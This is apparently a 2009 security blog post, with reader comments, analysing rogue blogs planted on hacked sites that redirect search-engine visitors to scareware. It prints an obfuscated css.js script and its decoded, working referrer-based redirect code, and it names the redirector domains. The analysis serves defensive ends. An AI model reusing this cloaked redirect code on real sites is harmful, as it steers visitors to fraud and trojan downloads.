msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Rogue blogs redirect search traffic to bogus AV sites. Part 1.

   26 Nov 09   Filed in Website exploits

As I tweeted a few days ago, I gathered a lot of interesting information about this case. So to make the post readable, I’ve broken it down into two parts. The first part is about how rogue blogs work, and the second part is about different generations of this black hat campaign and about the connection with Servage hosting provider.

A few days ago, I stumbled upon a great post where guys from Cyveillance blog wrote about a massive Google search results poisoning. Well worth reading.

Here is a brief summary of their post:

  1. Hackers created rogue blogs in subdirectories of legitimate web sites.
  2. The blogs look like picture sites where each post is just 5 images from Google Search results for the query that matches the post title.
  3. Every blog targets individual set of not very popular keywords (the long tail) i.e. “blue mustang picture“, “upstate ny photos“, “pictures of 2008 cadillac“, “cinderella story pictures“, “fan remote wiring diagram“, etc.
  4. The blogs are harmless if you type their addresses in a browser, but if you visit them clicking on Google’s search results, you’ll be redirected to a scareware site that makes visitors to download and install a bogus anti-virus program (which is really a trojan).
  5. All the blogs have the same structure. And since they target Google, this search engine can be used to find rogue blogs.  E.g. allinurl:albums/bsblog/category search returns 295,000 results. Another modification allinurl:bmsblog/category returns 110,000 results.

When I checked the web sites I discovered a few more interesting facts about this criminal campaign.

Rogue blog architecture

All rogue sites are built on the same anonymous PHP-based blogging platform. Although it’s quite minimalistic, it supports  many essential blogging features such as categories, themes, RSS feeds, and SEO-friendly URL’s.

Categories: all the blogs have the same set of categories (which helps to find them using Google). E.g. coooooool, yeah, lol, great, wow, HAHAHAHAHAH, sex, free, photos, etc. Posts are usually completely irrelevant to the categories – another sign of automated content generation.

All (thousands) the rogue blogs use just a bunch (about 10) of free blogger themes.

To generate SEO-friendly URLs they seem to be using rewrite rules in .htaccess files.

For example, bmsblog/page/276/ is actually bmsblog/index.php?page=276
and bmsblog/upstate-ny-photos/ is bmsblog/index.php?id=upstate-ny-photos

You can access them either way.

I wonder where they store data. I don’t believe it is MySql. Probably they use flat files.

And, finally, they have one more common feature that makes them malicious: the css.js file in the root directory of each blog.

JS redirects

Hacked websites that redirect search engine traffic to scareware sites is nothing new. Most of them use server-side redirects using conditional rewrite rules in .htaccess files.

However, in this case, hackers decided to use client-side redirects. Every rogue blog includes a css.js file located in the root directory of the blog.

<script type="text/javascript" src="http://hacked-site.tld/subfirectories/bmsblog/css.js"></script>

This script looks like this (the script is truncated here):

var host = '104011611162112305840475047610470978114911401211045211231114116511660467099811090470';
var pid = '58s09';
var sid = '9f93bc';
function dMY(k) {    function sVJ(V) {        var s = new Array(Math.ceil(V.length / 4));        for...
dMY.apply(dMY, [unescape("%20%CFh%05%210%21%82L7%19%17%B4%2110%21N%24%DEd%924h%E6%88%D1%9C%13%E4%E5%...

When this script is decoded (thanks to jsunpack) we get

var host = '104011611162112305840475047610470978114911401211045211231114116511660467099811090470';
var pid = '58s09';
var sid = '9f93bc';
var _host = '';
for (var i = 0; i < host.length; i = i + 4) {
if (host.substr(i, 1) == '0') {
_host = _host + String.fromCharCode(parseInt(host.substr(i+1, 2)));
}
else {
_host = _host + String.fromCharCode(parseInt(host.substr(i, 3)));
}
}
var url = _host+'?pid='+pid+'&sid='+sid;
if ( document.referrer && document.referrer != '' && (document.referrer.match(/msn/i) ||
document.referrer.match(/live/i)  || document.referrer.match(/altavista/i) ||
document.referrer.match(/baidu/i) || document.referrer.match(/yahoo/i) ||
( document.referrer.match(/google/i) && (document.referrer.match(/imgres/i) ||
document.referrer.match(/search/i) || document.referrer.match(/blogsearch/i) ) ) )) {
if (top.location.replace) {
top.location.replace(url);
}
else {
top.location.href = (url);
}
}

As you can see, this script redirects users only if they come from sites that have pre-defined strings in their addresses. They are targeting visitors from popular search engines: MSN, Live.com (the script must be from a pre-Bing era), Altavista, Baidu, Yahoo!. In case of Google, they are only interested in visitors from Image Search (imgres), Web Search (search) and Blog Search (blogsearch).  Google hosts many other products on the google.com domain (e.g. Reader, Analytics, forums, etc) and hackers want to hide malicious redirects from users of Google’s non-search products.

Scareware sites

The host variable at the top of the script is an encoded domain of the site where this script redirects visitors to. To avoid blacklisting, this string changes every day and every day the rogue blogs redirect visitors to sites with new domain names. Here are a few of them: smile-life .cn, harry-pott .cn, firefoxavatar .cn, mozzillaclone .cn, antyspywarestore .com, flatletkick .cn , zapotec2 .cn, separator2009 .cn, solidresistance .cn, overmerit3 .cn .

These site (they act only as redirectors) immediately redirect people further to acual scareware sites (e.g.  antivir3 .com, antimalware-3 .com, cyber-scan008.com etc.) which perform a fake test and make people think that their computers are infected (Displaying Windows interface even for Linux and Mac users ;-)). Pretty much the same as what I described a year ago. Just slightly improved interface (the fake warning window is now draggable!). Don’t be fooled.

Everything on the scareware sites (warnings, fake test, downloads) works using JavaScript. If you disable JavaScript, you will only see a blank screen. Actually, you won’t be redirected in the first place since the initial redirect is also JavaScript-based.

This is another good reason to use the NoScript Firefox extension (is there something similar for other browsers?) that disables scripts on untrusted sites rendering all the hackers’ efforts useless.

To be continued..

In the part II of this post you will read about different generations of the rogue blogs and their evolution. It will be especially interesting to clients of Servage hosting provider, which seems to have been affected the most.

Similar posts:

Reader's Comments (8)

  1. |

    [...] & NoScript だけでもお願いします。 FireMobileSimulatorもできたら・・・ Rogue blogs regirect search traffic to bogus AV sites. Part 1. Unmask Parasites [...]

  2. |

    [...] This post was mentioned on Twitter by Denis, Joe Burton. Joe Burton said: internetcrimes.net Rogue blogs regirect search traffic to bogus AV sites. Part 1 … http://bit.ly/5LklFm computer forensics [...]

  3. |

    [...] Read the details of the malware network at Unmask Parasites. [...]

  4. |

    [...] sind mehr als 100 000 Websites infiziert, wie unter anderem auch auf UmaskedParasites.com zu lesen ist. Dort wurde die Schadsoftware auch eine nähere Analyse des Schädlings statt. [...]

  5. |

    Thanks for post. very intresting. how then does this get injected into legitimate web sites. ? its happened to 5 of my websites – some did have old wordpress , and all hosted at Servage..

    • |

      WordPress is definitely not to blame.

      You should contact Servage and ask them to investigate this issue. Make sure to show them my articles. Especially the Part 2.

      If you have saved files from those rogue blog directories, I would definitely like to take a look at them.

  6. |

    I had a few of my Servage hosted domains hit with this. Unfortunately, I got here after deleting the files (via your P2 on a google for . I’ve got a ticket out with servage and I’ll see whether they have a backup of them. Apols.

    If you google “stfuagowi.com”, “repeat with omitted links” and look at the second page, you’ll see plenty of the links.

  7. |

    [...] novembre, ho scritto in merito ai rogue blog , creati nelle sottodirectory di siti legittimi. I blog contaminavano i risultati delle ricerche di [...]